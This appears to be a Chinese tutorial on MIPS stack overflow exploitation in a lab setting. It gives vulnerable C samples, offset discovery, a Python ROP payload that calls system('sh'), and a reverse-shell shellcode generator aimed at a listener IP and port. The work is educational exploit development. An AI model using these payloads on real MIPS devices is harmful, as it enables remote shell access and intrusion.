MIPS栈溢出：ROP构造与Shellcode注入技术详解<\/h1>

0. 前言<\/h2>

本文详细讲解MIPS架构下的栈溢出漏洞利用技术，包括ROP链构造和Shellcode注入方法。学习本教程前需要具备基本的MIPS汇编知识和缓冲区溢出概念。<\/p>

环境要求<\/strong>：<\/p>

推荐使用Ubuntu 16.04系统<\/li>
避免使用Ubuntu 18.04或更高版本，可能导致gadget找不到<\/li>
程序至少应在Ubuntu 16.04上交叉编译<\/li> <\/ul>
1. MIPS32架构堆栈特点<\/h2>
MIPS32架构与x86架构在函数调用方式上有显著差异：<\/p>

无EBP寄存器<\/strong>：MIPS没有栈底指针(EBP)，函数进栈时只需将当前指针向下移动n个比特(n为函数所需堆栈空间大小)，之后不再移动指针<\/li>
参数传递方式<\/strong>：

前4个参数通过$a0-$<\/span>a3寄存器传递<\/li>
超过4个的参数放入调用参数空间<\/li> <\/ul> <\/li>
返回地址存储<\/strong>：

x86：返回地址压入堆栈<\/li>
MIPS：返回地址存入$ra寄存器<\/li> <\/ul> <\/li> <\/ol>
2. MIPS函数调用机制<\/h2>
2.1 叶子函数与非叶子函数<\/h3>

叶子函数<\/strong>：函数内部不再调用其他任何函数<\/li>
非叶子函数<\/strong>：函数内部会调用其他函数<\/li> <\/ul>
调用过程<\/strong>：<\/p>

call指令复制当前$PC值到$<\/span>RA寄存器，然后跳转到被调函数执行<\/li>
判断被调函数类型：

非叶子函数：将$RA中的返回地址存入堆栈<\/li>
叶子函数：保持$RA不变<\/li> <\/ul> <\/li>
函数返回时：

非叶子函数：从堆栈取出返回地址存入$RA，然后`jr $<\/span>ra`<\/li>
叶子函数：直接jr $ra<\/code><\/li> <\/ul> <\/li> <\/ol> 2.2 函数调用参数传递示例<\/h3> #include<\/span><stdio.h><\/span> <\/span><\/span><\/span><\/span>int<\/span> test<\/span>(int<\/span> a,int<\/span> b,int<\/span> c,int<\/span> d,int<\/span> e,int<\/span> f,int<\/span> g); <\/span><\/span>int<\/span> main<\/span>() { <\/span><\/span> test(0<\/span>,1<\/span>,2<\/span>,3<\/span>,4<\/span>,5<\/span>,6<\/span>); <\/span><\/span> return<\/span> 0<\/span>; <\/span><\/span>} <\/span><\/span>int<\/span> test<\/span>(int<\/span> a, int<\/span> b, int<\/span> c, int<\/span> d, int<\/span> e, int<\/span> f, int<\/span> g) { <\/span><\/span> char<\/span> s[50<\/span>]=<\/span>{0<\/span>}; <\/span><\/span> sprintf(s,"%d%d%d%d%d%d%d"<\/span>,a,b,c,d,e,f,g); <\/span><\/span>} <\/span><\/span><\/code><\/pre>参数传递特点：<\/p> 前4个参数(v1-v4)存入$a0-$<\/span>a3<\/li> 后3个参数(v5-v7)按正序压入main函数栈顶预留空间<\/li> 低地址对应v5，高地址递增存放v6、v7<\/li> <\/ul> 3. MIPS缓冲区溢出原理<\/h2> 3.1 非叶子函数溢出<\/h3> #include<\/span><stdio.h><\/span> <\/span><\/span><\/span><\/span>void<\/span> stack<\/span>(char<\/span> *<\/span>src){ <\/span><\/span> char<\/span> a[20<\/span>]=<\/span>{0<\/span>}; <\/span><\/span> strcpy(a,src); <\/span><\/span>} <\/span><\/span>int<\/span> main<\/span>(int<\/span> argc,char<\/span> *<\/span>argv[]){ <\/span><\/span> stack(argv[1<\/span>]); <\/span><\/span> return<\/span> 0<\/span>; <\/span><\/span>} <\/span><\/span><\/code><\/pre>特点：<\/p> stack是非叶子函数，会将main的返回地址存入自己的堆栈<\/li> 缓冲区溢出可能覆盖main的返回地址<\/li> 与x86架构溢出原理相似<\/li> <\/ul> 3.2 叶子函数溢出<\/h3> #include<\/span><stdio.h><\/span> <\/span><\/span><\/span><\/span>void<\/span> stack<\/span>(char<\/span> *<\/span>src, int<\/span> count){ <\/span><\/span> char<\/span> s[20<\/span>]=<\/span>{0<\/span>}; <\/span><\/span> int<\/span> i=<\/span>0<\/span>; <\/span><\/span> for<\/span>(i=<\/span>0<\/span>;i<<\/span>count;i++<\/span>) s[i]=<\/span>src[i]; <\/span><\/span>} <\/span><\/span>int<\/span> main<\/span>(int<\/span> argc,char<\/span> *<\/span>argv[]) { <\/span><\/span> int<\/span> count=<\/span>strlen(argv[1<\/span>]); <\/span><\/span> stack(argv[1<\/span>],count); <\/span><\/span> return<\/span> 0<\/span>; <\/span><\/span>} <\/span><\/span><\/code><\/pre>特点：<\/p> stack是叶子函数，main的返回地址保持在$ra寄存器中<\/li> 常规溢出无法覆盖$ra寄存器<\/li> 但如果溢出足够大，可以覆盖main函数栈帧中上层函数的返回地址<\/li> <\/ul> 4. 漏洞利用实战<\/h2> 4.1 示例漏洞代码<\/h3> #include<\/span><stdio.h><\/span> <\/span><\/span><\/span>#include<\/span><sys\/stat.h><\/span> <\/span><\/span><\/span>#include<\/span><unistd.h><\/span> <\/span><\/span><\/span><\/span>void<\/span> do_system<\/span>(int<\/span> code,char<\/span> *<\/span>cmd) { <\/span><\/span> char<\/span> buf[255<\/span>]; <\/span><\/span> system(cmd); <\/span><\/span>} <\/span><\/span>void<\/span> main<\/span>() { <\/span><\/span> char<\/span> buf[256<\/span>]=<\/span>{0<\/span>}; <\/span><\/span> \/\/...文件读取和密码验证逻辑... <\/span><\/span><\/span><\/span> if<\/span>(!<\/span>strcmp(buf,"adminpwd"<\/span>)) { <\/span><\/span> do_system(count,"ls -L"<\/span>); <\/span><\/span> } <\/span><\/span> \/\/... <\/span><\/span><\/span><\/span>} <\/span><\/span><\/code><\/pre>4.2 确定偏移量<\/h3> 生成测试数据： python -c "print 'A'*500"<\/span> > passwd <\/span><\/span><\/code><\/pre><\/li> 动态调试配置： mips-linux-gnu-gcc -g -fno-stack-protector -no-pie -fno-pie -z execstack vuln_system.c -static -o vuln_system <\/span><\/span>sudo chroot . .\/qemu-mips-static -g 1234<\/span> .\/vuln_system <\/span><\/span><\/code><\/pre><\/li> 使用patternLocOffset.py确定精确偏移： python patternLocOffset.py -c -l 1000<\/span> -f passwd <\/span><\/span>python patternLocOffset.py -s [<\/span>崩溃地址]<\/span> -l 1000<\/span> <\/span><\/span><\/code><\/pre>本例中偏移量为404字节(0x194)<\/li> <\/ol> 4.3 ROP链构造<\/h3> 目标<\/strong>：利用do_system函数执行任意命令<\/p> 查找合适的gadget：<\/p> 使用IDA的mipsrop插件：mipsrop.stackfinders()<\/code><\/li> 选择能控制$a1寄存器的gadget（本例使用0x004474BC）<\/li> <\/ul> <\/li> 构造payload：<\/p> import<\/span> struct <\/span><\/span>cmd =<\/span> "sh"<\/span> <\/span><\/span>cmd +=<\/span> "<\/span>\00<\/span>"<\/span>*<\/span>(4<\/span>-<\/span>(len(cmd) %<\/span>4<\/span>)) # 栈对齐<\/span> <\/span><\/span>shellcode =<\/span> "A"<\/span>*<\/span>0x194<\/span> <\/span><\/span>shellcode +=<\/span> struct.<\/span>pack(">L"<\/span>,0x004474BC<\/span>) # gadget地址<\/span> <\/span><\/span>shellcode +=<\/span> "A"<\/span>*<\/span>0x18<\/span> # padding<\/span> <\/span><\/span>shellcode +=<\/span> cmd # 命令字符串<\/span> <\/span><\/span>shellcode +=<\/span> "B"<\/span>*<\/span>(0x3C<\/span> -<\/span> len(cmd)) # 填充<\/span> <\/span><\/span>shellcode +=<\/span> struct.<\/span>pack(">L"<\/span>, 0x00400A80<\/span>) # do_system地址<\/span> <\/span><\/span><\/code><\/pre><\/li> <\/ol> 4.4 Shellcode注入<\/h3> 反向连接Shellcode构造<\/strong>：<\/p> import<\/span> struct <\/span><\/span>import<\/span> socket <\/span><\/span> <\/span><\/span>def<\/span> makeshellcode<\/span>(hostip,port): <\/span><\/span> # 转换IP和端口为网络字节序<\/span> <\/span><\/span> host=<\/span>socket.<\/span>ntohl(struct.<\/span>unpack('I'<\/span>,socket.<\/span>inet_aton(hostip))[0<\/span>]) <\/span><\/span> hosts=<\/span>struct.<\/span>unpack('cccc'<\/span>,struct.<\/span>pack('>L'<\/span>,host)) <\/span><\/span> ports=<\/span>struct.<\/span>unpack('cccc'<\/span>,struct.<\/span>pack('>L'<\/span>,port)) <\/span><\/span> <\/span><\/span> # Shellcode主体<\/span> <\/span><\/span> mipshell =<\/span> "<\/span>\x24\x0f\xff\xfa<\/span>"<\/span> # li t7,-6<\/span> <\/span><\/span> mipshell +=<\/span> "<\/span>\x01\xe0\x78\x27<\/span>"<\/span> # nor t7,t7,zero<\/span> <\/span><\/span> # ...(省略中间部分)...<\/span> <\/span><\/span> mipshell +=<\/span> "<\/span>\x01\x01\x01\x0c<\/span>"<\/span> # syscall 0x40404<\/span> <\/span><\/span> return<\/span> mipshell <\/span><\/span> <\/span><\/span># 使用示例<\/span> <\/span><\/span>payload =<\/span> "a"<\/span>*<\/span>0x194<\/span> <\/span><\/span>payload +=<\/span> struct.<\/span>pack(">L"<\/span>,0x7ffff5d0<\/span>) # 栈地址<\/span> <\/span><\/span>payload +=<\/span> makeshellcode('192.168.119.149'<\/span>,8888<\/span>) # 监听IP和端口<\/span> <\/span><\/span><\/code><\/pre>注意事项<\/strong>：<\/p> 某些端口(如4444)可能被占用，建议使用其他端口(如8888)<\/li> 确保攻击机和靶机网络互通<\/li> 使用NetCat监听：nc -lvp 8888<\/code><\/li> <\/ol> 5. 关键问题与解决方案<\/h2> gadget找不到问题<\/strong>：<\/p> 确保使用Ubuntu 16.04环境<\/li> 交叉编译时使用相同环境<\/li> 尝试不同gadget搜索工具(ROPgadget\/mipsrop)<\/li> <\/ul> <\/li> Shellcode执行失败<\/strong>：<\/p> 检查栈地址是否正确<\/li> 确保没有坏字符(NULL字节等)<\/li> 验证网络连接和端口可用性<\/li> <\/ul> <\/li> 动态调试技巧<\/strong>：<\/p> 使用IDA远程调试<\/li> 在关键函数(如do_system)设置断点<\/li> 观察寄存器值和内存变化<\/li> <\/ul> <\/li> <\/ol> 6. 总结<\/h2> MIPS架构下的漏洞利用需要特别注意：<\/p> 函数调用约定与x86不同<\/li> 叶子函数与非叶子函数的区别<\/li> 参数传递方式特殊<\/li> ROP构造需要找到合适的gadget控制$a0-$<\/span>a3寄存器<\/li> Shellcode需要针对MIPS架构特别编写<\/li> <\/ol> 通过本文介绍的方法，可以系统性地进行MIPS栈溢出漏洞的分析和利用，实现ROP链构造和Shellcode注入。<\/p>